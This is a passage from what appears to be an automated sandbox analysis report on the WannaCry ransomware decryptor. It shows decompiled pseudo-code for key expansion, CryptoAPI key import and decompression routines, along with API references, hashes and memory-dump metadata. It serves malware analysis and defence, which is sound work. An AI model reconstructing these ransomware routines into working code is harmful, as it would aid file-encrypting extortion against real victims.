                                                      							 *(_t287 + 0x44) =  *(_t287 + 0x44) + 0x20;
                                                      						} while (_t145 <  *(_t286 + 0x410));
                                                      					}
                                                      					 *(_t287 + 0x44) = 0;
                                                      					if(_t196 > 0) {
                                                      						_t274 =  *(_t287 + 0x48);
                                                      						_t89 = _t286 + 0x454; // 0x4a8
                                                      						 *(_t287 + 0x48) = _t89;
                                                      						_t262 = _t198;
                                                      						 *((intOrPtr*)(_t287 + 0x30)) = _t233 - _t198;
                                                      						 *(_t287 + 0x2c) =  *((intOrPtr*)(_t287 + 0x20)) - _t198;
                                                      						do {
                                                      							_t200 =  *(_t286 + 8 + ( *(_t287 + 0x44) +  *(_t286 + 0x410) * 8) * 4);
                                                      							 *_t274 =  *0x00416FB0 ^ _t200 >> 0x00000018;
                                                      							_t275 =  &(_t274[1]);
                                                      							asm("cdq");
                                                      							 *_t275 =  *0x00416FB0 ^ _t200 >> 0x00000010;
                                                      							asm("cdq");
                                                      							_t276 =  &(_t275[1]);
                                                      							 *_t276 =  *0x00416FB0 ^ _t200 >> 0x00000008;
                                                      							_t277 =  &(_t276[1]);
                                                      							asm("cdq");
                                                      							 *_t277 =  *(( *(_t286 + 0x454 + ( *(_t287 + 0x2c) + _t262) % _t196 * 4) & 0x000000ff) + 0x416fb0) ^ _t200;
                                                      							_t274 =  &(_t277[1]);
                                                      							_t145 =  *(_t287 + 0x44) + 1;
                                                      							_t262 = _t262 + 1;
                                                      							 *(_t287 + 0x44) = _t145;
                                                      							 *(_t287 + 0x48) =  &(( *(_t287 + 0x48))[4]);
                                                      						} while (_t145 < _t196);
                                                      					}
                                                      					return _t145;
                                                      				} else {
                                                      					return E0040A610(_t286,  *(_t287 + 0x44),  *(_t287 + 0x48));
                                                      				}
                                                      			}































                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040ADD9
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040ADE9
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: e2a5344183224385ce8cc6f64ef416fa8b7c135a3dae7c4b4300b22148696450
                                                      • Instruction ID: 9bf03c186ab60868eb4058f96665f2b4dca6c7ab88ed953fee9cff2198bbc34e
                                                      • Opcode Fuzzy Hash: e2a5344183224385ce8cc6f64ef416fa8b7c135a3dae7c4b4300b22148696450
                                                      • Instruction Fuzzy Hash: D691BE756083858FC718CF28D8805AABBE2FFC9308F14487EE989D7351C634E956CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004046F0(void* __ecx, CHAR* _a4) {
                                                      
                                                      				_t25 = __ecx;
                                                      				if(E004046B0(__ecx) != 0) {
                                                      					_t7 = _a4;
                                                      					if(_a4 != 0) {
                                                      						if(E004049B0( *(__ecx + 4), __ecx + 8, _t7) != 0) {
                                                      							goto L7;
                                                      						} else {
                                                      							E00404770(_t25);
                                                      							return 0;
                                                      						}
                                                      					} else {
                                                      						if(CryptImportKey( *(__ecx + 4), 0x420794, 0x494, 0, 0, __ecx + 8) != 0) {
                                                      							L7:
                                                      							return 1;
                                                      						} else {
                                                      							E00404770(_t25);
                                                      							return 0;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					E00404770(__ecx);
                                                      					return 0;
                                                      				}
                                                      			}




                                                      APIs
                                                        • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                                      • CryptImportKey.ADVAPI32(?,00420794,00000494,00000000,00000000,?,?,00402031,?), ref: 00404727
                                                        • Part of subcall function 00404770: CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 0040477B
                                                        • Part of subcall function 00404770: CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 00404790
                                                        • Part of subcall function 00404770: CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt$ContextDestroy$AcquireImportRelease
                                                      • String ID:
                                                      • API String ID: 3621138593-0
                                                      • Opcode ID: 9403bbdd090a9753ee064b817ff4eb55f6c4c80258570a396feff9da41e395ed
                                                      • Instruction ID: d4e90e0c2f988709a992e7d604814048f9cd1a1bd42c9a5a50fcd20aee9fd3f8
                                                      • Opcode Fuzzy Hash: 9403bbdd090a9753ee064b817ff4eb55f6c4c80258570a396feff9da41e395ed
                                                      • Instruction Fuzzy Hash: 5DF019F130425156E660E675A942F9B62998BE1B08F00483BF605E72D1EB78EC42829C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E004046B0(void* __ecx) {
                                                      				int _t5;
                                                      				HCRYPTPROV* _t8;
                                                      				signed int _t9;
                                                      
                                                      				_t9 = 0;
                                                      				_t8 = __ecx + 4;
                                                      				while(1) {
                                                      					asm("sbb eax, eax");
                                                      					_t5 = CryptAcquireContextA(_t8, 0,  ~_t9 & "Microsoft Enhanced RSA and AES Cryptographic Provider", 0x18, 0xf0000000);
                                                      					if(_t5 != 0) {
                                                      						break;
                                                      					}
                                                      					_t9 = _t9 + 1;
                                                      					if(_t9 < 2) {
                                                      						continue;
                                                      					} else {
                                                      						return _t5;
                                                      					}
                                                      					L5:
                                                      				}
                                                      				return 1;
                                                      				goto L5;
                                                      			}







                                                      APIs
                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AcquireContextCrypt
                                                      • String ID:
                                                      • API String ID: 3951991833-0
                                                      • Opcode ID: bfca8852325fc6aa5ed2ff2f6e8500fcc0a6d4c389fe5d637677a2daa5e65efa
                                                      • Instruction ID: 312dc029323720c7b5bb6801e757edcf2da9b650c6ce32f76f805a45e944d122
                                                      • Opcode Fuzzy Hash: bfca8852325fc6aa5ed2ff2f6e8500fcc0a6d4c389fe5d637677a2daa5e65efa
                                                      • Instruction Fuzzy Hash: 63E0C27B35003029E320042ABC05BE786C8D7E2B61F014436FD05E6184D1598C8780D8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 89%
                                                      			E0040DF30() {
                                                      				intOrPtr _t308;
                                                      				intOrPtr _t310;
                                                      				signed int _t356;
                                                      				signed int* _t361;
                                                      				signed int _t362;
                                                      				intOrPtr _t403;
                                                      				signed int _t409;
                                                      				intOrPtr _t410;
                                                      				void* _t411;
                                                      				void* _t412;
                                                      
                                                      				_t410 =  *((intOrPtr*)(_t412 + 0x24));
                                                      				_t409 =  *(_t412 + 0x2c);
                                                      				_t361 =  *(_t410 + 4);
                                                      				_t411 =  *_t409;
                                                      				_t356 =  *(_t410 + 0x1c);
                                                      				 *(_t412 + 0x2c) =  *(_t409 + 4);
                                                      				_t308 =  *((intOrPtr*)(_t410 + 0x30));
                                                      				 *(_t412 + 0x28) =  *(_t410 + 0x20);
                                                      				_t403 =  *((intOrPtr*)(_t410 + 0x34));
                                                      				 *(_t412 + 0x10) = _t361;
                                                      				if(_t403 >= _t308) {
                                                      					_t310 =  *((intOrPtr*)(_t410 + 0x2c)) - _t403;
                                                      				} else {
                                                      					_t310 = _t308 - _t403 - 1;
                                                      				}
                                                      				_t362 =  *_t361;
                                                      				 *((intOrPtr*)(_t412 + 0x14)) = _t310;
                                                      				if(_t362 > 9) {
                                                      					L86:
                                                      					 *(_t410 + 0x20) =  *(_t412 + 0x28);
                                                      					 *(_t410 + 0x1c) = _t356;
                                                      					 *(_t409 + 4) =  *(_t412 + 0x2c);
                                                      					_push(0xfffffffe);
                                                      					_push(_t409);
                                                      					 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
                                                      					 *_t409 = _t411;
                                                      					_push(_t410);
                                                      					 *((intOrPtr*)(_t410 + 0x34)) = _t403;
                                                      					return E0040DDA0();
                                                      				} else {
                                                      					do {
                                                      						switch( *((intOrPtr*)(_t362 * 4 +  &M0040E6CC))) {
                                                      							case 0:
                                                      								if(_t310 < 0x102 ||  *(_t412 + 0x2c) < 0xa) {
                                                      									L12:
                                                      									_t315 =  *(_t412 + 0x10);
                                                      									 *_t315 = 1;
                                                      									_t315[3] = 0;
                                                      									_t315[2] = _t315[5];
                                                      									goto L13;
                                                      								} else {
                                                      									 *(_t410 + 0x20) =  *(_t412 + 0x28);
                                                      									 *(_t410 + 0x1c) = _t356;
                                                      									 *(_t409 + 4) =  *(_t412 + 0x2c);
                                                      									 *_t409 = _t411;
                                                      									_t349 =  *(_t412 + 0x10);
                                                      									 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
                                                      									 *((intOrPtr*)(_t410 + 0x34)) = _t403;
                                                      									_push(_t409);
                                                      									_push(_t410);
                                                      									_push(_t349[6]);
                                                      									_push(_t349[5]);
                                                      									_push(0);
                                                      									_push(0);
                                                      									_t350 = E0040FBC0();
                                                      									_t411 =  *_t409;
                                                      									_t356 =  *(_t410 + 0x1c);
                                                      									 *(_t412 + 0x44) =  *(_t409 + 4);
                                                      									_t397 =  *((intOrPtr*)(_t410 + 0x30));
                                                      									 *(_t412 + 0x40) =  *(_t410 + 0x20);
                                                      									_t403 =  *((intOrPtr*)(_t410 + 0x34));
                                                      									_t412 = _t412 + 0x18;
                                                      									 *(_t412 + 0x30) = _t350;
                                                      									if(_t403 >= _t397) {
                                                      										_t399 =  *((intOrPtr*)(_t410 + 0x2c)) - _t403;
                                                      									} else {
                                                      										_t399 = _t397 - _t403 - 1;
                                                      									}
                                                      									 *((intOrPtr*)(_t412 + 0x14)) = _t399;
                                                      									if(_t350 == 0) {
                                                      										goto L12;
                                                      									} else {
                                                      										asm("sbb eax, eax");
                                                      										 *( *(_t412 + 0x10)) = ( ~(_t350 - 1) & 0x00000002) + 7;
                                                      										_t310 =  *((intOrPtr*)(_t412 + 0x14));
                                                      										goto L85;
                                                      									}
                                                      								}
                                                      								goto L99;
                                                      							case 1:
                                                      								L13:
                                                      								_t317 = ( *(_t412 + 0x10))[3];
                                                      								 *(_t412 + 0x18) = _t317;
                                                      								if(_t356 >= _t317) {
                                                      									L16:
                                                      									_t321 = ( *(_t412 + 0x10))[2] + ( *(0x41a260 + _t317 * 4) &  *(_t412 + 0x28)) * 8;
                                                      									 *(_t412 + 0x18) = _t321;
                                                      									 *((intOrPtr*)(_t412 + 0x1c)) = 0;
                                                      									 *(_t412 + 0x28) =  *(_t412 + 0x28) >>  *(_t321 + 1);
                                                      									_t373 =  *(_t412 + 0x18);
                                                      									_t356 = _t356;
                                                      									_t326 =  *_t373;
                                                      									if(0 != 0) {
                                                      										if((_t326 & 0x00000010) == 0) {
                                                      											if((_t326 & 0x00000040) == 0) {
                                                      												goto L34;
                                                      											} else {
                                                      												_t329 =  *(_t412 + 0x10);
                                                      												if((_t326 & 0x00000020) == 0) {
                                                      													 *_t329 = 9;
                                                      													 *(_t409 + 0x18) = "invalid literal/length code";
                                                      													goto L90;
                                                      												} else {
                                                      													 *_t329 = 7;
                                                      													_t310 =  *((intOrPtr*)(_t412 + 0x14));
                                                      													goto L85;
                                                      												}
                                                      											}
                                                      										} else {
                                                      											_t381 =  *(_t412 + 0x10);
                                                      											_t381[2] = 0;
                                                      											 *_t381 = 2;
                                                      											_t381[1] =  *( *(_t412 + 0x18) + 4);
                                                      											_t310 =  *((intOrPtr*)(_t412 + 0x14));
                                                      											goto L85;
                                                      										}
                                                      									} else {
                                                      										_t337 =  *(_t412 + 0x10);
                                                      										_t337[2] =  *(_t373 + 4);
                                                      										 *_t337 = 6;
                                                      										_t310 =  *((intOrPtr*)(_t412 + 0x14));
                                                      										goto L85;
                                                      									}
                                                      								} else {
                                                      									while(1) {
                                                      										_t338 =  *(_t412 + 0x2c);
                                                      										if(_t338 == 0) {
                                                      											goto L88;
                                                      										}
                                                      										 *(_t412 + 0x2c) = _t338 - 1;
                                                      										_t345 = 0 << _t356;
                                                      										_t356 = _t356 + 8;
                                                      										 *(_t412 + 0x30) = 0;
                                                      										_t317 =  *(_t412 + 0x18);
                                                      										_t411 = _t411 + 1;
                                                      										 *(_t412 + 0x28) =  *(_t412 + 0x28) | _t345;
                                                      										if(_t356 < _t317) {
                                                      											continue;
                                                      										} else {
                                                      											goto L16;
                                                      										}
                                                      										goto L99;
                                                      									}
                                                      									goto L88;
                                                      								}
                                                      								goto L99;
                                                      							case 2:
                                                      								__ecx =  *(__esp + 0x10);
                                                      								__eax =  *( *(__esp + 0x10) + 8);
                                                      								 *(__esp + 0x18) = __eax;
                                                      								if(__ebx >= __eax) {
                                                      									L26:
                                                      									__ecx =  *(0x41a260 + __eax * 4);
                                                      									__eax =  *(__esp + 0x28);
                                                      									__ecx = __ecx &  *(__esp + 0x28);
                                                      									__eax =  *(__esp + 0x10);
                                                      									 *((intOrPtr*)( *(__esp + 0x10) + 4)) =  *((intOrPtr*)( *(__esp + 0x10) + 4)) + __ecx;
                                                      									__ecx =  *(__esp + 0x18);
                                                      									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
                                                      									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
                                                      									__eax =  *(__esp + 0x18);
                                                      									__ebx = __ebx -  *(__esp + 0x18);
                                                      									__eax =  *(__esp + 0x10);
                                                      									__ecx = 0;
                                                      									__cl =  *((intOrPtr*)(__eax + 0x11));
                                                      									 *__eax = 3;
                                                      									 *(__eax + 0xc) = 0;
                                                      									__ecx =  *(__eax + 0x18);
                                                      									 *(__eax + 8) =  *(__eax + 0x18);
                                                      									goto L28;
                                                      								} else {
                                                      									while(1) {
                                                      										__eax =  *(__esp + 0x2c);
                                                      										if(__eax == 0) {
                                                      											goto L88;
                                                      										}
                                                      										__eax = __eax - 1;
                                                      										__ecx = __ebx;
                                                      										 *(__esp + 0x2c) = __eax;
                                                      										__eax = 0;
                                                      										__al =  *__ebp;
                                                      										__ebx = __ebx + 8;
                                                      										__eax = 0 << __cl;
                                                      										__ecx =  *(__esp + 0x28);
                                                      										 *(__esp + 0x30) = 0;
                                                      										__ecx =  *(__esp + 0x28) | 0 << __cl;
                                                      										__eax =  *(__esp + 0x18);
                                                      										__ebp = __ebp + 1;
                                                      										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
                                                      										if(__ebx < __eax) {
                                                      											continue;
                                                      										} else {
                                                      											goto L26;
                                                      										}
                                                      										goto L99;
                                                      									}
                                                      									goto L88;
                                                      								}
                                                      								goto L99;
                                                      							case 3:
                                                      								__eax =  *(__esp + 0x10);
                                                      								L28:
                                                      								__eax =  *(__eax + 0xc);
                                                      								 *(__esp + 0x18) = __eax;
                                                      								if(__ebx >= __eax) {
                                                      									L31:
                                                      									__ecx =  *(0x41a260 + __eax * 4);
                                                      									__eax =  *(__esp + 0x28);
                                                      									__ecx = __ecx &  *(__esp + 0x28);
                                                      									 *(__esp + 0x10) =  *( *(__esp + 0x10) + 8);
                                                      									__eax =  *( *(__esp + 0x10) + 8) + __ecx * 8;
                                                      									__ecx = 0;
                                                      									 *(__esp + 0x18) = __eax;
                                                      									__cl =  *((intOrPtr*)(__eax + 1));
                                                      									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
                                                      									 *(__esp + 0x1c) = 0;
                                                      									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
                                                      									__eax = 0;
                                                      									__ecx =  *(__esp + 0x18);
                                                      									__ebx = __ebx;
                                                      									__eax = 0;
                                                      									__al =  *( *(__esp + 0x18));
                                                      									if((__al & 0x00000010) == 0) {
                                                      										if((__al & 0x00000040) != 0) {
                                                      											__eax =  *(__esp + 0x10);
                                                      											 *( *(__esp + 0x10)) = 9;
                                                      											__edi[6] = "invalid distance code";
                                                      											L90:
                                                      											 *(_t410 + 0x20) =  *(_t412 + 0x28);
                                                      											 *(_t410 + 0x1c) = _t356;
                                                      											 *(_t409 + 4) =  *(_t412 + 0x2c);
                                                      											_push(0xfffffffd);
                                                      											_push(_t409);
                                                      											 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
                                                      											 *_t409 = _t411;
                                                      											_push(_t410);
                                                      											 *((intOrPtr*)(_t410 + 0x34)) = _t403;
                                                      											return E0040DDA0();
                                                      										} else {
                                                      											L34:
                                                      											( *(_t412 + 0x10))[3] = _t326;
                                                      											( *(_t412 + 0x10))[2] =  *(_t412 + 0x18) +  *( *(_t412 + 0x18) + 4) * 8;
                                                      											_t310 =  *((intOrPtr*)(_t412 + 0x14));
                                                      											goto L85;
                                                      										}
                                                      									} else {
                                                      										__ecx =  *(__esp + 0x10);
                                                      										__eax = 0;
                                                      										 *((intOrPtr*)(__ecx + 8)) = 0;
                                                      										 *(__esp + 0x18) =  *( *(__esp + 0x18) + 4);
                                                      										 *__ecx = 4;
                                                      										 *(__ecx + 0xc) =  *( *(__esp + 0x18) + 4);
                                                      										__eax =  *(__esp + 0x14);
                                                      										goto L85;
                                                      									}
                                                      								} else {
                                                      									while(1) {
                                                      										__eax =  *(__esp + 0x2c);
                                                      										if(__eax == 0) {
                                                      											goto L88;
                                                      										}
                                                      										__eax = __eax - 1;
                                                      										__ecx = __ebx;
                                                      										 *(__esp + 0x2c) = __eax;
                                                      										__eax = 0;
                                                      										__al =  *__ebp;
                                                      										__ebx = __ebx + 8;
                                                      										__eax = 0 << __cl;
                                                      										__ecx =  *(__esp + 0x28);
                                                      										 *(__esp + 0x30) = 0;
                                                      										__ecx =  *(__esp + 0x28) | 0 << __cl;
                                                      										__eax =  *(__esp + 0x18);
                                                      										__ebp = __ebp + 1;
                                                      										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
                                                      										if(__ebx < __eax) {
                                                      											continue;
                                                      										} else {
                                                      											goto L31;
                                                      										}
                                                      										goto L99;
                                                      									}
                                                      									goto L88;
                                                      								}
                                                      								goto L99;
                                                      							case 4:
                                                      								__eax =  *(__esp + 0x10);
                                                      								__eax =  *( *(__esp + 0x10) + 8);
                                                      								 *(__esp + 0x18) = __eax;
                                                      								if(__ebx >= __eax) {
                                                      									L38:
                                                      									__ecx =  *(0x41a260 + __eax * 4);
                                                      									__eax =  *(__esp + 0x28);
                                                      									__ecx = __ecx &  *(__esp + 0x28);
                                                      									__eax =  *(__esp + 0x10);
                                                      									 *((intOrPtr*)( *(__esp + 0x10) + 0xc)) =  *((intOrPtr*)( *(__esp + 0x10) + 0xc)) + __ecx;
                                                      									__ecx =  *(__esp + 0x18);
                                                      									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
                                                      									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
                                                      									__eax =  *(__esp + 0x18);
                                                      									__ebx = __ebx -  *(__esp + 0x18);
                                                      									__eax =  *(__esp + 0x10);
                                                      									 *( *(__esp + 0x10)) = 5;
                                                      									goto L39;
                                                      								} else {
                                                      									while(1) {
                                                      										__eax =  *(__esp + 0x2c);
                                                      										if(__eax == 0) {
                                                      											break;
                                                      										}
                                                      										__ecx = 0;
                                                      										__eax = __eax - 1;
                                                      										__cl =  *__ebp;
                                                      										 *(__esp + 0x2c) = __eax;
                                                      										__eax = 0;
                                                      										__ecx = __ebx;
                                                      										__eax = 0 << __cl;
                                                      										__ecx =  *(__esp + 0x28);
                                                      										__ebx = __ebx + 8;
                                                      										 *(__esp + 0x30) = 0;
                                                      										__ecx =  *(__esp + 0x28) | 0 << __cl;
                                                      										__eax =  *(__esp + 0x18);
                                                      										__ebp = __ebp + 1;
                                                      										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
                                                      										if(__ebx < __eax) {
                                                      											continue;
                                                      										} else {
                                                      											goto L38;
                                                      										}
                                                      										goto L99;
                                                      									}
                                                      									L88:
                                                      									 *(_t410 + 0x1c) = _t356;
                                                      									 *(_t410 + 0x20) =  *(_t412 + 0x28);
                                                      									 *(_t409 + 4) = 0;
                                                      									 *_t409 = _t411;
                                                      									 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
                                                      									 *((intOrPtr*)(_t410 + 0x34)) = _t403;
                                                      									_push( *(_t412 + 0x30));
                                                      									_push(_t409);
                                                      									_push(_t410);
                                                      									return E0040DDA0();
                                                      								}
                                                      								goto L99;
                                                      							case 5:
                                                      								L39:
                                                      								__ecx =  *(__esp + 0x10);
                                                      								__eax = __edx;
                                                      								__eax = __edx -  *((intOrPtr*)( *(__esp + 0x10) + 0xc));
                                                      								__ecx =  *(__esi + 0x28);
                                                      								 *(__esp + 0x1c) = __eax;
                                                      								if(__eax < __ecx) {
                                                      									__eax =  *(__esi + 0x2c);
                                                      									__eax =  *(__esi + 0x2c) - __ecx;
                                                      									__ecx =  *(__esp + 0x1c);
                                                      									 *(__esp + 0x20) = __eax;
                                                      									while(1) {
                                                      										__ecx = __ecx + __eax;
                                                      										__eax =  *(__esi + 0x28);
                                                      										if(__ecx >=  *(__esi + 0x28)) {
                                                      											break;
                                                      										}
                                                      										__eax =  *(__esp + 0x20);
                                                      									}
                                                      									 *(__esp + 0x1c) = __ecx;
                                                      								}
                                                      								__ecx =  *(__esp + 0x10);
                                                      								__eax =  *(__ecx + 4);
                                                      								__eax =  *(__esp + 0x14);
                                                      								if( *(__ecx + 4) != 0) {
                                                      									do {
                                                      										if(__eax != 0) {
                                                      											goto L62;
                                                      										} else {
                                                      											__eax =  *(__esi + 0x2c);
                                                      											 *(__esp + 0x18) = __eax;
                                                      											if(__edx != __eax) {
                                                      												L52:
                                                      												 *(__esi + 0x34) = __edx;
                                                      												__edx =  *(__esp + 0x30);
                                                      												_push( *(__esp + 0x30));
                                                      												_push(__edi);
                                                      												_push(__esi);
                                                      												__eax = E0040DDA0();
                                                      												__edx =  *(__esi + 0x34);
                                                      												 *(__esp + 0x3c) = __eax;
                                                      												__eax =  *(__esi + 0x30);
                                                      												__esp = __esp + 0xc;
                                                      												 *(__esp + 0x20) = __eax;
                                                      												if(__edx >= __eax) {
                                                      													__eax =  *(__esi + 0x2c);
                                                      													__eax =  *(__esi + 0x2c) - __edx;
                                                      												} else {
                                                      													__eax = __eax - __edx;
                                                      													__eax = __eax - 1;
                                                      												}
                                                      												__ecx =  *(__esi + 0x2c);
                                                      												 *(__esp + 0x14) = __eax;
                                                      												 *(__esp + 0x18) = __ecx;
                                                      												if(__edx == __ecx) {
                                                      													__ecx =  *(__esi + 0x28);
                                                      													__eax =  *(__esp + 0x20);
                                                      													if(__eax == __ecx) {
                                                      														__eax =  *(__esp + 0x14);
                                                      													} else {
                                                      														__edx = __ecx;
                                                      														if(__edx >= __eax) {
                                                      															__eax =  *(__esp + 0x18);
                                                      															__eax =  *(__esp + 0x18) - __edx;
                                                      														} else {
                                                      															__eax = __eax - __edx;
                                                      															__eax = __eax - 1;
                                                      														}
                                                      													}
                                                      												}
                                                      												if(__eax == 0) {
                                                      													goto L91;
                                                      												} else {
                                                      													goto L62;
                                                      												}
                                                      											} else {
                                                      												__eax =  *(__esi + 0x30);
                                                      												__ecx =  *(__esi + 0x28);
                                                      												if(__eax == __ecx) {
                                                      													goto L52;
                                                      												} else {
                                                      													__edx = __ecx;
                                                      													if(__edx >= __eax) {
                                                      														__eax =  *(__esp + 0x18);
                                                      														__eax =  *(__esp + 0x18) - __edx;
                                                      													} else {
                                                      														__eax = __eax - __edx;
                                                      														__eax = __eax - 1;
                                                      													}
                                                      													if(__eax != 0) {
                                                      														goto L62;
                                                      													} else {
                                                      														goto L52;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      										goto L99;
                                                      										L62:
                                                      										__ecx =  *(__esp + 0x1c);
                                                      										__edx = __edx + 1;
                                                      										 *(__esp + 0x30) = 0;
                                                      										__cl =  *( *(__esp + 0x1c));
                                                      										 *(__edx - 1) = __cl;
                                                      										__ecx =  *(__esp + 0x1c);
                                                      										__ecx =  *(__esp + 0x1c) + 1;
                                                      										__eax = __eax - 1;
                                                      										 *(__esp + 0x1c) = __ecx;
                                                      										 *(__esp + 0x14) = __eax;
                                                      										if(__ecx ==  *(__esi + 0x2c)) {
                                                      											__ecx =  *(__esi + 0x28);
                                                      											 *(__esp + 0x1c) =  *(__esi + 0x28);
                                                      										}
                                                      										__ecx =  *(__esp + 0x10);
                                                      										_t212 = __ecx + 4;
                                                      										 *_t212 =  *(__ecx + 4) - 1;
                                                      									} while ( *_t212 != 0);
                                                      								}
                                                      								goto L84;
                                                      							case 6:
                                                      								if(__eax != 0) {
                                                      									L83:
                                                      									__ecx =  *(__esp + 0x10);
                                                      									__edx = __edx + 1;
                                                      									__eax = __eax - 1;
                                                      									 *(__esp + 0x30) = 0;
                                                      									__cl =  *( *(__esp + 0x10) + 8);
                                                      									 *(__esp + 0x14) = __eax;
                                                      									 *(__edx - 1) = __cl;
                                                      									__ecx =  *(__esp + 0x10);
                                                      									L84:
                                                      									 *__ecx = 0;
                                                      									goto L85;
                                                      								} else {
                                                      									__eax =  *(__esi + 0x2c);
                                                      									 *(__esp + 0x18) = __eax;
                                                      									if(__edx != __eax) {
                                                      										L73:
                                                      										 *(__esi + 0x34) = __edx;
                                                      										__edx =  *(__esp + 0x30);
                                                      										_push( *(__esp + 0x30));
                                                      										_push(__edi);
                                                      										_push(__esi);
                                                      										__eax = E0040DDA0();
                                                      										__edx =  *(__esi + 0x34);
                                                      										 *(__esp + 0x3c) = __eax;
                                                      										__eax =  *(__esi + 0x30);
                                                      										__esp = __esp + 0xc;
                                                      										 *(__esp + 0x20) = __eax;
                                                      										if(__edx >= __eax) {
                                                      											__eax =  *(__esi + 0x2c);
                                                      											__eax =  *(__esi + 0x2c) - __edx;
                                                      										} else {
                                                      											__eax = __eax - __edx;
                                                      											__eax = __eax - 1;
                                                      										}
                                                      										__ecx =  *(__esi + 0x2c);
                                                      										 *(__esp + 0x14) = __eax;
                                                      										 *(__esp + 0x18) = __ecx;
                                                      										if(__edx == __ecx) {
                                                      											__ecx =  *(__esi + 0x28);
                                                      											__eax =  *(__esp + 0x20);
                                                      											if(__eax == __ecx) {
                                                      												__eax =  *(__esp + 0x14);
                                                      											} else {
                                                      												__edx = __ecx;
                                                      												if(__edx >= __eax) {
                                                      													__eax =  *(__esp + 0x18);
                                                      													__eax =  *(__esp + 0x18) - __edx;
                                                      												} else {
                                                      													__eax = __eax - __edx;
                                                      													__eax = __eax - 1;
                                                      												}
                                                      											}
                                                      										}
                                                      										if(__eax == 0) {
                                                      											L91:
                                                      											__eax =  *(__esp + 0x28);
                                                      											__ecx =  *(__esp + 0x2c);
                                                      											 *(__esi + 0x20) =  *(__esp + 0x28);
                                                      											 *(__esi + 0x1c) = __ebx;
                                                      											__ebx =  *__edi;
                                                      											__eax = __ebp;
                                                      											__edi[1] =  *(__esp + 0x2c);
                                                      											__ecx = __edi[2];
                                                      											__eax = __ebp -  *__edi;
                                                      											 *__edi = __ebp;
                                                      											__ecx = __edi[2] + __ebp -  *__edi;
                                                      											__edi[2] = __edi[2] + __ebp -  *__edi;
                                                      											__ecx =  *(__esp + 0x30);
                                                      											_push( *(__esp + 0x30));
                                                      											_push(__edi);
                                                      											_push(__esi);
